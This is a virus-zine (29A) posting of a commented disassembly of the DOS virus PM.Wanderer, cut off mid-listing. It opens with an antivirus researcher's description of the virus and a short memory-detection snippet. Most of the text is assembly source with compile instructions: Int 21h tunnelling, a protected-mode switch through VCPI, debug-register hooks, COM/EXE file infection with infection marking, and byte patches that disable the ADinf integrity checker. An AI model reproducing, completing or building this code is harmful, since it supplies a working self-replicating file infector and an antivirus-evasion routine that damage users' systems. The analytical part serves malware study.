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29A Issue 02 04 01

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Published in 
 · 28 Dec 2019


; ³ PM.Wanderer ³
; ³ Disassembled by ³
; ³ Tcp/29A ³
; This is one of the very few DOS viruses which use protected mode in order
; to perform its functioning and the first to do it in a pretty effective
; way. It appears encrypted in files by means of a polymorphic engine, whose
; garbage generator i've kinda liked, based in a table and a decoder of the
; contents of that table. This makes the engine pretty flexible as it's pos-
; sible to add entries to the table, being able to make the generated garba-
; ge much more confusing, without having to modify anything else.
; However the most notorious feature in this virus is the way it works under
; protected mode. I've included below an article written by the AVer (DrWeb)
; Igor Daniloff for VirusBulletin in which he makes a pretty good descrip-
; tion of the functioning of this part of the virus. Anyway there are some
; errors in the text, so i've commented them with (* *).
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
; Protected Mode Supervisor?
; Igor Daniloff
; DialogueScience
; Since their introductions, PCx have become increasingly complex through
; advances in both hardware and software. Computer viruses are also becoming
; more complex and intricate as their authors try to adapt them to changes
; in the computer environment.
; Now there are viruses that infect PC boot sectors of disks, DOS, Windows,
; Windows'95, OS/2, and Linux program files, as well as documents created in
; Word and Excel. Virus authors have devised stealth tecniques to help avoid
; detection, and anti-debugging and anti-virus mechanismes to make initial
; detection, then analysis more difficult. They have incorporated
; polymorphism in boot sectors, files, and memory to make detection more
; laborious and time-consuming for anti-virus designers. Since the release
; of i386 processors, viruses have begun to use 32-bit instructions in their
; codes. Some polymorphic viruses employ 32-bit operands in their decryptors.
; Unfortunately, viruses aim to survive and gain the upper hand under the
; existing conditions, using all conceivable software and hardware
; techniques. With the emergence of 286, and later 32-bit i386 processors,
; came protected (or virtual) operation mode. Thus far, virus authors have
; not successfully harnessed protected mode. Some have tried to master it,
; but their attempts have been unsuccessful because of changes with important
; operating system components.
; In 1994, the boot virus PMBS was the first to tackle protected mode, but
; could not cope with other applications or drivers (EMM386, Windows, OS/2)
; also using that mode. In the same year, viruses Evolution.2761 and
; Evolution.2770 succeeded in tapping part of the power of the protected
; mode, but only when the processor was in the real mode. These viruses
; replaced the actual interrupt vector table with their own interrupt
; descriptor table (IDT), which they loaded with IDT register. How did the
; Evolution viruses could use this technique in everyday life? I doubt there
; is a PC user who runs i386-Pentium in real mode.
; Although the i386 processor made its debut long ago, viruses have still
; failed to master its powerful protected mode. I believe that virus
; designers have cherished this hope for some time, and that one among them
; finally appears to have realized it.
; PM.Wanderer, apparently written in Russia, is a file infector which uses a
; cruide form of protected mode. It is surprisingly stable, interacting more
; or less correctly with other programs that utilize this mode. The name is
; derived from the string 'WANDERER,(c)P.Demenuk'.
; A resident polymorphic virus PM.Wanderer installs its resident part in the
; memory and toggles the processor to the protected mode, by utilizing the
; documented virtual control program interface (VCPI) of the extended memory
; supervisor (EMS, EMM386).
; Installation
; On starting an infected program, the virus polymorphic decryptor decodes
; the main virus body and passes control to it. The virus code determines a
; location in the upper addresses of DOS memory, writes itself to this
; memory, and hands over control to the copy higher in memory. Then it
; restores the code of the infected file in the program segment (for EXE
; files, it also configures the addresses of relocated elements) and begins
; to install resident component.
; First, the virus checks whether there is an extended memory manager (EMS)
; in the system. It does this by retrieving the address of Int 67h (Extended
; Memory) though Int 21h function AX=3567h (Get Interrupt Vector), and
; checking whether the characters 'EM' exist in EMS header. Then the virus
; verifies whether its resident part is already installed by calling function
; AX=BABAh of Int 21h and locking for the answer AX=FA00h.
; If there is no active EMM in the system, or the resident part of the virus
; is already installed (and in subsequent operation, if there is no VCPI or
; an error occurs installing the resident copy), the virus frees the memory
; reserved for installing the resident copy and passes control to the host
; program. This completes the life cycle of the virus in a system. However,
; if environmental conditions are favourable, the virus intercepts Int 01h
; and traces Int 21h looking, for the word 9090h (two NOPs) in the original
; Int 21h handler code of MS DOS version 5.00-7.00.
; If this string is detected, the virus retrieves from a specific handler
; address the address of Int 21 handler kernel, which is usually located in
; the high memory area, and writes this address to its body. This address is
; subsequently used by the virus for calling the Int 21h handler kernel for
; infecting files.
; Then the virus verifies the presence of VCPI and reserves the physical
; addresses of four memory pages. IT next retrieves the address of VCPI, page
; table, and the addresses of GDT (Global Descriptor Table. This consists of
; three elements: the first is the code segment descriptor, and the other two
; are used by the VCPI driver). The virus writes a reference to the pages
; allotted by the VCPI driver to the page table, and retrieves the physical
; address of the memory page of the segment in which the virus is currently
; located. It also gets GDT and IDT registers. Next, the virus creates three
; (code and data) descriptors and a descriptor for the task state segment
; (TSS) in GDT.
; Finally, it prepares the values for the registers CR3, GDTR, IDTR, LDTR
; (Local Descriptor Table Register), TR (Task Register), and the address
; CS:EIP of the protected mode entry point. Using the VCPI tools, the virus
; toggles the processor to protected mode with the highest privilege level,
; known as the supervisor.
; In the protected mode, the virus corrects IDT (* corrects GDT *) by creating
; two segment descriptors, then searches for the TSS descriptor (* searches for
; page table *). Next the virus defines two breakpoints: one at the first byte
; of the code of the current INT 21h handler (0000:0084h) and the other at
; the first byte of the code in BIOS at 0FE00:005Bh (linear address 0FE05Bh).
; The BIOS location usually holds the 'near jump to reboot'. The virus then
; corrects IDT to set debug exceptions at Int 01h and Int 09h. It also defines
; two handler descriptors: trap gate and interrupt gate.
; After these preliminaries, the virus writes its code to the memory page and
; switches the processor back to the virtual mode in order to free the DOS
; memory in upper addresses and to return the control to the infected
; program. From this instant, the infected program begins its "normal" work,
; but Int 01h and Int 09h have been redefined by the virus as trap gate and
; interrupt gate in protected mode, respectively.
; Keyboard Handler
; On receiving control, the virus-defined Int 09h handler verifies whether
; the two virus-defined breakpoints exist, and restores them if either has
; been zeroed. Using the register DR7, the virus checks whether the two
; breakpoints (0 and 1) are defined, without verifying their linear
; addresses. If either of the breakpoints is missing, the virus calls the
; procedure that instantly restores them to their initial status. The
; virus-defined Int 09h handler also keeps a close watch on the pressing of
; Ctrl-Alt-Del and `resets' all breakpoints when this key combination is
; used.
; Debug Exceptions Handler The virus-defined debug exceptions handler
; verifies whether either of the virus breakpoints has been reached by
; checking the command address. If control passed to this handler from the
; 'near jump to reboot' in BIOS, the virus resets all breakpoints just as the
; virus-defined keyboard handler does when the key combination Ctrl-Alt-Del
; is pressed.
; If the exception was caused by the breakpoint of the original DOS Int 21h
; handler, the virus analyzes the AX register to determine the function of
; Int 21h, and behaves accordingly. Prior to analyzing this, the virus sets
; the resume flag (RF=1) in the stack's EFLAGS register that is intended to
; return control to the breakpoint. This flag is set should a debug exception
; take place while returning control to the breakpoint.
; If Int 21h is called with AX=0BABAh, the virus the virus recognizes this as
; its 'Are you there?' call. If PM.Wanderer is installed it writes writes the
; value 0FACCh in the AX register and returns control to the original DOS Int
; 21h handler. On exiting from the DOS handler, the AL register is set to
; zero. The register value AX=0FA00h informs the non-resident virus that a
; copy is already active.
; If Int 21h is called with either AX=4B00h (start program) or AH=3Dh and the
; lower 4 bits of AL set to zero (open file for reading), the virus decides
; to infect. The virus writes its code to 9000:0000h (linear address 90000h),
; prepares a stack, and toggles the processor to 8086 virtual mode with IRETD
; command at third and last privilege level.
; File Infection
; In virtual mode, the virus code verifies the last two characters (OM or XE)
; of the filename extension, creates a polymorphic copy, and infects files
; longer than 4095 bytes. PM.Wanderer does not infect a files if seconds
; field of file's time-stamp is 34, assuming that the file is already
; infected, assuming the file is already infected, nor does the virus alter
; file attributes. Therefore read only files are not infected. Further, the
; virus does not infect a particular program with seven-character filename. I
; could not find the name of this file: the virus defines it implicitly by
; computing the CRC of itss name.
; The virus does not take over Int 24h (Critical Error Handler), so when
; critical errors (for example, writing to write-protected disks) occur
; during infection, the standard DOS query - Retry, Ignore, Fail, Abort? - is
; displayed. The virus infects a file by calling the DOS Int 21h handler
; directly, using the address obtained from tracing Int 21h at installation.
; The virus code is prepended to the header of COM files and inserted into
; the middle of EXE files, immediately below the header. Prior to this, the
; relocations field in the header is zeroed by moving the original program
; code to the file end. The `real working code' of the virus is 3684 bytes
; long, but the size of infected files increases by more than 3940 bytes.
; (* exactly between 3940 and 4036 bytes: 3684 + decryptor (256 to 352) *)
; Exit from the V-mode of DOS-machine
; The virus uses a smart technique to exit the V-mode and to transfer control
; to the breakpoint of the DOS Int 21h handler that called the debug
; exceptions, so that DOS functions normally. Were the virus to infect a file
; while in P-mode, everything would be simple - it would be sufficient to
; execute the IRETD command. Since the virus has toggled to the V-mode with
; privilege level three, it is possible for the debug exceptions handler to
; switch back to P-mode. Therefore, the virus plays an elegant trick to
; surmount the situation.
; If an error occurs during infection or while exiting from the virtual mode,
; the virus calls Int 21h with AX=4B00h. When Int 21h is called with
; AX=4B00h, control jumps to the first command of the DOS Int 21h handler.
; This command contains a virus-defined breakpoint. Control must now be
; transferred to the debug exceptions handler in P-mode. However, the V-mode
; monitor discovers the need to process the next debug exception. The point
; is that the virus debug exceptions handler has not returned the control to
; the breakpoint and is still busy processing the current debut exception.
; Therefore, the V-mode monitor terminates the Int 21h call, aborts
; processing the current debug exception, and returns control to the
; breakpoint with the values stored in the registers of the previous Int 21h
; call.
; Payload
; If the debug exceptions handler is passed AX=3506h (such a call for getting
; the INT 06 address usually exists in all programs compiled from high-level
; languages, such as C, Pascal), PM.Wanderer scans the linear address space
; 0-90000h looking for a string that obviously belongs to the Russian
; integrity checker ADinf. If this string is found, the virus modifies it in
; order to disable the alerts ADinf usually raises on detecting changes to
; files and disks.
; Search for the Virus in Memory: It is clear from the above that conventional
; memory scanning methods are incapable of detecting the resident copy of the
; virus at level zero privilege in the protected mode. The resident copy can
; be detected only after toggling to the highest privilege level of protected
; mode with the help of GDT or IDT. However, this virus can be trapped by
; other conventional methods. Here, the linear addresses of the first two
; breakpoints (0 and 1) must be determined and compared with the values
; described above. The possible presence of PM.Wanderer in the memory can be
; decided from theese addresses. It is imperative that such operations be
; carried out only in a DOS session. In assembler language, this can be done
; as follows:
; .8086
; MOV AX,0BABAH ;simulate that the virus is checking its
; INT 21H ;presence in the memory
; CMP AX,0FA00H ;did the resident copy respond?
; JNE ExitCheckMemory
; .386P
; MOV EAX,DR7 ;read register DR7
; CMP EAX,20AH ;are 2 breakpoints defined?
; JNE ExitCheckMemory
; MOV EAX,DR1 ;read linear address of breakpoint 1
; CMP EAX,0FE05BH ;is it set at 0FE00:005BH in BIOS?
; JNE ExitCheckMemory
; .8086
; MOV AH,9
; MOV DX,OFFSET VirusIsFound
; INT 21H ;alert about the possible presence of
; CLI ;virus in the memory
; JMP $+0 ;"hang up" system
; INT 20H ;terminate operation
; Test
; After infecting several thousand files, the virus behaves like a 'lodger'
; with all infected files remaining operative. A file becomes inoperative
; only if, after infection, its stack are located within the virus code.
; While infecting EXE files, PM.Wanderer does not modify the start SS:SP
; values in the EXE header. As already mentioned, the virus is capable of
; reproduction only if EMS (EMM386) is installed in the system. If EMM386 is
; installed with the /NOEMS option, when the virus toggles processor to
; protected mode, the system will reboot. The computer may also reboot if
; QEMM386 is installed.
; The virus loses its reproduciability under Windows 3.1x and Windows 95.
; These operating systems cut off an already resident PM.Wanderer, because
; while loading they install their own handlers in IDT and zero all
; breakpoints. Prior to terminating a session and returning to DOS, Windows
; restores the previous status of the interrupt descriptor table. On pressing
; a key in DOS environment, the virus gets control, installs its own
; breakpoints, and continues its activities. Due to the absence of VCPI in a
; DOS session within Windows, the virus cannot return to the protected mode
; there. For the same reason, the virus is also inoperative under OS/2.
; Conclusion
; PM.Wanderer is the first virus to utilize i386 the protected mode and not
; conflict with the domimamt Microsoft operating systems, which also use that
; mode. It is possibly that future viruses may completely overwrite the
; supervisor with their own code supporting the DPMI, EMS/VCPI, XMS, and Int
; 15h extended memory interfaces. Who knows?
; PM.Wanderer
; Aliases: None known
; Type: Memory resident in P-mode, polymorphic
; Infection: COM and EXE files
; Self-recognition in
; Memory: See description
; Self-recognition in Files: Bit 1 and bit 4 in seconds field of file's
; time-stamp set
; Hex Pattern in Files: The virus is polymorphic, and there is no
; useful hex pattern.
; Hex Pattern in Memory: Virus works in P-mode, see description
; Intercepts: In IDT: Int 09h for enabling breakpoints,
; Int 1 for infection
; Payload: Patch the integrity checker ADinf in
; memory.
; Removal: Under clean system conditions, identify
; and replace infected files
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
; Other data
; Virus : PM.Wanderer
; Size : 3684 (code) + 256-352 (decryptor) = 3940-4036 bytes
; Author : P. Demenuk
; Origin : Russia
; Disasm by : Tcp/29A
; Greetings
; They go this time to l- (i got it) ;), and to Vecna/29A, as he was working
; in the same project at the same time, without any of we both having reali-
; sed about that fact :) I noticed it also happened the same to him with the
; Dementia disassembly... that's bad luck, man! :)
; Send any question or comment to
; Compiling it
; tasm /m wanderer.asm (ignore warnings, if any)
; tlink /t /3 wanderer (ignore fixup overflow errors)

.386p ; Of course, 386 protected mode
wanderer segment byte public 'CODE' use16
assume cs:wanderer, ds:data0, es:data0, ss:data0
org 100h

; Selectors :
CODE_SEL = 8 ; CS Selector
DATACS_SEL = 10h ; CS Alias Selector
ALLMEM_SEL = 18h ; 4GB Memory Selector
TSS_SEL = 28h ; TSS Selector
VCPICS_SEL = 30h ; VCPI CS Selector

VIRUS_SIZE = virus_end - start

call get_delta
pop si
sub si,3 ; Get delta offset
mov di,offset(start)
mov ax,cs
push ds
mov ds,ax
mov es,ax
push offset(mem_mcb)
mov bx,offset(copy_code)
mov word ptr [bx],0A4F2h ; Encode 'repnz movsb'
mov word ptr [bx+2],0C361h ; Encode 'popa ; ret'
jmp bx

db 0Ah,'WANDERER,(c) P. Demenuk',0Ah

pop ax
dec ax
mov es,ax ; ES:=MCB
mov bx,es:[3] ; Get number of paragraphs in this MCB
mov ds:size_mcb,bx
inc ax
mov es,ax ; ES:=PSP
jmp alloc_mem

mov bx,ds:size_mcb
sub bx,600h ; 600h*16 = 24576 bytes
mov ah,4Ah
int 21h ; Adjust memory block size
; ES = segment addr of block to change
; BX = new size in paragraphs
mov bx,500h ; 500h*16 = 20480 bytes
mov ah,48h
int 21h ; Allocate memory
; BX = 16-byte paragraphs desired
jc free_mem ; Error? then jmp
mov es,ax
xor di,di
xor si,si
mov cx,2048
mov ds:codesegment,cs
rep movsw ; Copy 4K to allocated memory
push cs
push ax
push offset(new_mem_pos)
retf ; Jump to new copy

push cs
pop ds
cmp ds:host_type,0 ; COM file?
jz check_resident ; Yes? then jmp
mov ah,62h
int 21h ; Get PSP address
mov es,bx
mov es,es:[2Ch] ; ES:=environment
xor di,di
mov cx,8000h
mov al,1
repne scasb ; Search for '1h' (file path)
inc di ; Current file path
push es
pop ds
mov ax,3D00h
mov dx,di
int 21h ; Open file (read)
xchg ax,bx ; BX := handle
pop ds
mov ax,4200h
mov dx,cs:filesize_l
mov cx,cs:filesize_h
int 21h ; Lseek end of original file
mov ah,3Fh
mov cx,cs:size_in_file
xor dx,dx
int 21h ; Read from file
push ds
push cs
pop ds
mov ax,4200h
mov dx,ds:ofs_relocitems
xor cx,cx
int 21h ; Lseek start of relocation table
mov cx,ds:reloc_items
shl cx,1 ; x2 (number of bytes in reloc. table)
shl cx,1
mov dx,offset(buffer1)
mov ah,3Fh
int 21h ; Read relocation table
mov ah,3Eh
int 21h ; Close file
mov si,offset(buffer1)
pop ax
mov cx,ds:reloc_items
jcxz no_reloc_items ; Any relocation item? No? then jmp
add [si+2],ax ; Relocate item in memory
les di,[si]
add es:[di],ax
add si,4
loop l_reloc
mov psp_seg,ax
mov ax,3567h
int 21h ; Get int 67h vector
cmp word ptr es:[0Ah],'ME' ; EMM386 loaded?
push cs
pop es
jne exec_host ; No? then jmp
mov ax,0BABAh ; Residency check
int 21h
cmp ax,0FA00h ; Already resident?
jne go_resident ; No? then jmp
mov ah,49h
int 21h ; Free memory
cmp ds:host_type,0 ; COM file?
jz exec_com ; Yes? then jmp
mov ax,psp_seg
add ax,ds:file_reloCS
push ax ; CS
push ds:file_exeIP ; IP
mov ax,psp_seg
sub ax,10h
mov es,ax
mov ds,ax
jmp restore_mcb

mov sp,0FFFEh ; Set stack pointer
push 100h ; IP
mov si,ds:filesize_l
and si,si ; Is the virus dropper?
jz exit_program ; Yes? then jmp
mov di,100h
add si,di ; End of original file
mov es,ds:codesegment
mov ds,ds:codesegment
push es
push offset(copy_code)
mov cx,ds:size_in_file
mov ah,4Ah
mov bx,cs:size_mcb
int 21h ; Restore MCB size
retf ; Restore original code and return to host

mov ax,4C00h
int 21h ; Exit program

call encrypt_infection_routine ; Decrypt
call tunnel_i21
mov ax,0DE00h ; VCPI installation check
call VCPI ; Doesn't return if not installed
mov saved_sp,sp
mov saved_ss,ss
mov di,offset(pages_4K)
mov cx,4 ; Allocate 4 pages (4K per page)
mov ax,0DE04h ; VCPI - Allocate a 4K page
call VCPI
mov [di],edx ; EDX = physical address of page
scasd ; == add di,4
loop l_alloc_page
mov bx,cs
add bx,100h ; Align data area on page
xor bl,bl
inc bh
mov es,bx ; Base address of directory page
mov ds:addr_dir_page,bx
xor ax,ax
xor di,di
mov cx,(4096+4096)/2 ; 2 pages
rep stosw ; Clear directory page area (4K)
; and page table (4K)
mov ax,0DE01h ; VCPI - Get Protected Mode Interface
; ES:DI -> 4K page table buffer
; DS:SI -> three descriptor table
; entries in GDT. First
; becomes code segment
; descriptor, other two for
; use by main control prog.
mov ds,bx ; DS := segment of dir page table
inc bh ; add 100h
mov es,bx ; ES := segment of page table
xor di,di
mov si,100h+VCPICS_SEL ; GDT in page table + 100h
call VCPI
push cs
pop ds
mov ds:pm_ep,ebx ; EBX = protected mode EP in code seg.
xor si,si
mov cx,400h ; 4GB, all addressable memory
xor bx,bx ; BX in [0..3FFh]
l_entry: ; Map the memory in the page table
mov eax,es:[si] ; Read page table entry
cmp eax,0 ; Invalid (available) entry?
jnz next_page_entry ; No? then jmp
movzx eax,bx ; Page entry
shl eax,0Ch ; Page frame address
mov al,67h ; Dirty, Accessed, User, Write, Present
mov es:[si],eax ; Store page in page table
add si,4 ; Next entry
inc bx
loop l_entry
mov eax,ds:page_1 ; Map page_1 in page table
mov esi,eax
mov al,67h ; Dirty, Accessed, User, Write, Present
shr esi,0Ah ; Calculate page number in page table
mov es:[esi],eax ; Store page in page table
mov ds:virus_cs,cs
call setup_system_regs
sidt qword ptr ds:IDT
sgdt qword ptr ds:GDT
mov esi,100h ; GDT ( table + 100h)
push es
pop ds
mov cx,cs
movzx ecx,cx
shl ecx,4 ; Segment Base (CS)
mov ax,CODE_SEL
mov ebx,0FFFFh ; Segment Limit (64K)
mov dx,0000000010011010b ; Access rights: Executable
; code, readable, present,
; DPL 0
push ecx
push ebx
call build_descriptor
pop ebx ; Limit (64K)
pop ecx
mov dx,0000000010010010b ; Access rights: Data, writable,
; present, DPL 0
call build_descriptor
xor ecx,ecx
mov ebx,0FFFFFFFFh ; Limit (4GB: granularity on)
mov dx,1000000010010010b ; Access rights: Data, writeble,
; present, granularity, DPL 0
call build_descriptor
mov ax,TSS_SEL
mov cx,ds
movzx ecx,cx
shl ecx,4 ; Addr. directory page table
push ecx
add ecx,10h ; TSS in table + 10h
mov dx,0000000010001001b ; Access rights: System, DPL 0,
; available 386 TSS, present
mov ebx,67h ; Limit
call build_descriptor
pop ecx ; Addr. directory page table
add ecx,100h ; GDT in table + 100h
push cs
pop ds
mov ds:base_gdt,ecx
mov ax,cs
movzx esi,ax
mov ax,0DE0Ch
shl esi,4
add esi,offset(system_registers)
int 67h ; VCPI - Switch to protected mode
; ESI = linear address in first megabyte of
; values for system registers
; Return: interrupts disabled
; GDTR, IDTR, LDTR, TR loaded
jmp $

ofs_i1 dw 0
seg_i1 dw 0
save_ss dw 0
save_sp dw 0

push bp
push ds
push si
mov bp,sp
lds si,[bp+6] ; Get return address from stack
cmp word ptr [si],9090h ; NOP+NOP? (int 21h entry point)
je found_i21_entry ; Yes? then jmp
pop si
pop ds
pop bp

mov ax,3501h
int 21h ; Get int 1h vector (trace)
mov ds:ofs_i1,bx
mov ds:seg_i1,es
mov dx,offset(int_1)
mov ah,25h
int 21h ; Set new int 1h
push cs
push cs
mov ds:save_ss,ss ; Save stack
mov ds:save_sp,sp
pop ax ; Read flags
or ax,100h ; Set bit trace on
push ax
xor ax,ax
mov ds,ax ; DS := 0
mov ah,30h ; Get DOS version
push cs
pop es
popf ; Activate int 1h tunneler
call dword ptr ds:[21h*4]
pop es
xor ax,ax
mov ds,ax ; DS := 0
mov di,offset(ofs_i21)
mov si,21h*4
pop ds
push cs
jmp restore_i1

mov ss,cs:save_ss ; Restore stack
mov sp,cs:save_sp
mov si,[si+8]
lodsw ; Store int 21h entry point
mov cs:ofs_i21,ax
pop ds
mov ds:seg_i21,ax
xor ax,ax
mov es,ax ; ES := 0
mov di,1h*4
mov si,offset(ofs_i1)
movsw ; Restore int 1h
pop es

; PM Entry point
mov ss,ax ; Stack descriptor
mov sp,offset(_stack)
mov es,ax ; Extra data descriptor
mov ds,ax ; Data descriptor
mov esi,es:GDT_base
movzx ecx,es:GDT_limit
inc ecx ; First entry unused
shr ecx,3 ; Number of entries in GDT
xor bx,bx
xor eax,eax
add esi,8 ; Next descriptor
add bx,00001000b ; Next selector
cmp eax,[esi+4] ; Available entry?
jne next_gdt_entry ; No? then jmp
mov es:virus_selector,bx
mov ebx,0FFFh ; Limit 4K
mov ecx,es:page_1
mov dx,0000000010011011b ; Access rights: Code, Readable,
; present, accessed, DPL 0
call build_descriptor
add esi,8 ; Next descriptor
xor ecx,ecx
mov ebx,0FFFFFFFFh ; Limit (4GB : granurality on)
mov dx,1000000010010010b ; Access rights: Data, Writable,
; present, DPL 0
call build_descriptor
jmp search_pagetable

loop l_next_gdt_entry
jmp no_descriptor ; Descriptor not found in GDT

mov esi,1024*1024 ; 1MB
add esi,4*1024 ; 4KB (a page)
cmp dword ptr [esi],67h ; Page for address 0 ?
jne l_search_pagetable ; No? then jmp
cmp dword ptr [esi+4],1067h ; Page for address 4096 ?
jne l_search_pagetable ; No? then jmp
mov es:pagetable,esi
movzx eax,word ptr ds:[21h*4] ; Get int 21h vector
movzx ebx,word ptr ds:[21h*4+2]
shl ebx,4 ; Calculate physical address
add eax,ebx
mov es:i21h_ep,eax ; Save old int 21h
call set_breakpoints
mov es:infecting,0 ; Flag: can infect files
mov eax,es:page_1 ; Insert vir page in page table
mov ebx,eax
mov al,67h
shr ebx,0Ah
mov [esi][ebx],eax
mov di,offset(orig_i1)
mov ecx,1 ; Int 1h (trace)
mov ax,offset(pm_int_1)
call build_idt_descriptor
add di,6 ; offset(orig_i9)
mov ecx,9 ; Int 9h
mov ax,offset(pm_int_9)
call build_idt_descriptor
push es
push ds
pop es
pop ds
xor esi,esi
mov edi,ds:page_1
mov ecx,1024
db 0F3h,66h,67h,0A5h ; rep movsd (TASM FIX)
; Copy (4k) to virus page
movzx eax,saved_sp
mov bx,ds:virus_cs
push cx
push bx ; GS
push cx
push bx ; FS
push cx
push bx ; DS
push cx
push bx ; ES
push cx
push saved_ss ; SS
push es
push ds
pop es
pop ds
push eax ; ESP
pushfd ; Flags
push cx
push bx ; CS
push 0
push offset(free_virmem) ; EIP
movzx esp,sp
mov ax,0DE0Ch ; Switch to protected mode (v86 mode)
call fword ptr cs:pm_ep

push eax
mov eax,dr7
and ax,0000001100001010b ; Check breakpoints
cmp ax,0000001100001010b ; Removed?
je check_ctrlaltdel ; No? then jmp
call set_breakpoints ; else restore them
in al,60h ; Read scan code from keyboard
cmp al,53h ; DEL key?
jne exit_pm9 ; No? then jmp
call set_ds
mov al,ds:[417h] ; Get keyboard status (0:417h)
and al,0Ch
cmp al,0Ch ; CTRL & ALT pressed?
jne exit_pm9 ; No? then jmp
xor eax,eax
mov dr7,eax ; Remove breakpoints if reset
pop eax
jmp fword ptr cs:orig_i9

pop eax
jmp fword ptr cs:orig_i1

push eax
mov eax,dr6 ; Test breakpoint number
test al,3 ; Breakpoint 0 or 1?
jz exit_pm1 ; No? then jmp
test al,2 ; Breakpoint 1?
jz dos_bp ; Yes? then jmp
xor eax,eax ; Else breakpoint 0
mov dr7,eax ; Remove breakpoints
pop eax

xor eax,eax
mov dr6,eax ; Clear dr6 (never cleared by CPU)
pop eax
or byte ptr [esp+0Ah],1 ; Set RF in stack
cmp ax,0BABAh ; Residency check?
jne check_function ; No? then jmp
mov ax,0FACCh ; DOS will try to exec function 0FACCh
; but it doesn't exist, then DOS will
; return 0FA00h

cmp ax,3506h ; Get int 6 vector?
je check_patch ; Yes? then jmp
cmp ax,4B00h ; Exec file?
je check_prev_inf ; Yes? then jmp
cmp ah,3Dh ; Open file?
jne _iretd ; No? then jmp
test al,0Fh ; For reading?
jne _iretd ; No? then jmp
cmp cs:infecting,1 ; Exist a copy for infection?
je kill_copy4infection ; Yes? Kill it (finished work)
call set_ds
mov es,ax
mov ecx,cs:page_1
xor ebp,ebp
mov esi,90h ; Segment 90h (phys. 90000h)
mov edx,cs:page_2[ebp*4]
call map_page
db 66h,67h,89h,9Ch,0A9h ; (TASM FIX)
dd offset(old_pages) ; mov [ecx+old_pages][ebp*4],ebx
; Store old page
inc esi ; Next 4KB
inc bp ; Next page
cmp bp,3 ; Pages 2,3 and 4 in page table?
jne l_map_page234 ; No? then jmp
mov esi,cs:page_1
mov edi,90000h
mov ds:[esi+infecting],1
mov [esi+STACK_SIZE],esp ; moc [esi+_esp],esp (TASM FIX)
mov ecx,400h ; 4KB
db 0F3h,66h,67h,0A5h ; rep movsd (TASM FIX)
; Copy code
mov ax,ss
mov ds,ax
mov esi,esp
mov edi,cs:page_1
mov ecx,STACK_SIZE/4
db 0F3h,66h,67h,0A5h ; rep movsd (TASM FIX)
; Copy stack
mov eax,9000h
push eax ; GS
push eax ; FS
push dword ptr [esp+20h] ; DS
push dword ptr [esp+20h] ; ES
push eax ; SS
db 66h ; (TASM FIX) PUSH 0FFFEh (dword)
push 0FFEh ; ESP
dw 0 ; (TASM FIX)
push 23000h ; EFLAGS (VM 8086, RPL 3)
push eax ; CS
mov eax,offset(infect_file)
push eax ; EIP
iretd ; Jump to infect_file task, pm level 3

mov bx,cs
mov ds,bx ; DS = CS
add bx,8
mov es,bx
mov esi,offset(memory_patch)
mov bp,2 ; Number of patches
mov edi,90000h
mov eax,[si]
dec edi
jz skip_patch
cmp es:[edi],eax ; Maybe the code it's searching
jne search_patch ; No? then jmp
movzx ebx,byte ptr [si+4]
mov edx,[si+5]
cmp es:[edi][ebx],edx ; Code found?
jne search_patch ; No? then jmp
movsx ebx,byte ptr [si+9] ; Offset to the patch
add edi,ebx
movzx ecx,byte ptr [si+0Ah] ; Number of bytes to patch
add si,start_patch1-memory_patch
db 0F3h,67h,0A4h ; rep movsb (TASM FIX)
; Patch it
jmp next_patch

movzx ax,[si+0Ah] ; Point next patch
add si,ax
add si,start_patch1-memory_patch
dec bp ; Another patch?
jnz search_code ; Yes? then jmp
jmp exit_21h

; Patch #1
db 83h, 0c6h, 32h, 81h ; Bytes to search (1)
db 0Ah ; Offset to bytes (2)
db 68h, 4Eh, 9Ch, 9Ah ; Bytes to search (2)
db 0Dh ; Offset to the patch
db end_patch1-start_patch1 ; Patch size
db 0EBh, 3 ; Patch code

; Patch #2
db 8Dh, 56h, 0D6h, 3 ; Bytes to search (1)
db 5 ; Offset to bytes 2
db 36h, 89h, 7, 8Bh ; Bytes to search (2)
db 0FCh ; Offset to the patch
db end_patch2-start_patch2 ; Patch size
db 0D1h, 0E6h, 83h, 0FEh, 0Ah, 75h, 2, 33h, 0C0h, 89h
db 42h, 0D6h, 0D1h, 0EEh, 4, 6, 93h ; Patch code

xor ax,ax
mov di,dx
mov cx,41h
push ds
pop es
repne scasb ; Search end of path
jcxz jmp_return_dpl0 ; Found? No? then jmp
jmp check_extension ; Yes? then jmp

jmp return_dpl0

mov ax,[di-4] ; Read file extension
and ax,0F0Fh
cmp ax,('OC' and 0F0Fh) ; (*.CO?) COM file?
je executable_file ; Yes? then jmp
cmp ax,('XE' and 0F0Fh) ; (*.EX?) EXE file?
je executable_file ; Yes? then jmp
jmp return_dpl0

mov si,di
sub si,6
mov cx,7
xor bx,bx
l_do_crc: ; Make CRC with filename
and al,1Fh
add bl,al
loop l_do_crc
cmp bl,3Fh ; Skip filename (CRC) ?
jne no_skip_file ; No? then jmp
jmp return_dpl0 ; Yes? then jmp

mov ax,3D02h
call int_21h ; Open file I/O
xchg ax,bx ; BX := handle
push cs
push cs
pop ds
pop es
call initialize_random_seed
mov ax,5700h
call int_21h ; Get file date & time
mov filedate,dx ; Save
mov filetime,cx
and cl,1Fh
cmp cl,11h ; Already infected?
je close_file ; Yes? then jmp
and byte ptr filetime,0E0h ; Mark infection
or byte ptr filetime,11h
mov dx,offset(buffer2)
mov ah,3Fh
call int_21h ; Read
cmp ax,BUFFER_SIZE ; Too small?
jne close_file ; Yes? then jmp
call go_end_file
mov ds:filesize_l,ax ; Save original file size
mov ds:filesize_h,dx
cmp ax,0F000h ; Too big?
ja close_file ; Yes? then jmp
cmp ds:signature,'ZM' ; EXE file?
je infect_exe ; Yes? then jmp
mov ds:host_type,0 ; It's a COM file
call setup_engine ; Encrypt virus code
push cx
mov ah,40h
mov dx,offset(buffer2)
call int_21h ; Write original code (end of file)
call go_start_file
pop cx
mov ah,40h
call int_21h ; Write encrypted virus code
mov cx,filetime
mov dx,filedate
mov ax,5701h
call int_21h ; Restore file date and time
mov ah,3Eh
call int_21h ; Close file
mov ax,4B00h
int 21h ; Re-enter virus int 21h to kill this
; copy done for replication

cmp ds:pages,5 ; Too small?
jb close_file ; Yes? then jmp
db 83h, 3Eh ; (TASM 2.5 FIX. UNNECESSARY IN 4.0)
dw offset(max_mem)
db 0FFh ; cmp ds:max_mem,0FFFFh
; Needs memory? TSR or exec files?
jne close_file ; Yes? then jmp
mov ds:host_type,1 ; It's an EXE file
xor ax,ax
xchg ax,ds:relo_items ; Numbers of relocation items
; Set it to 0
mov ds:reloc_items,ax
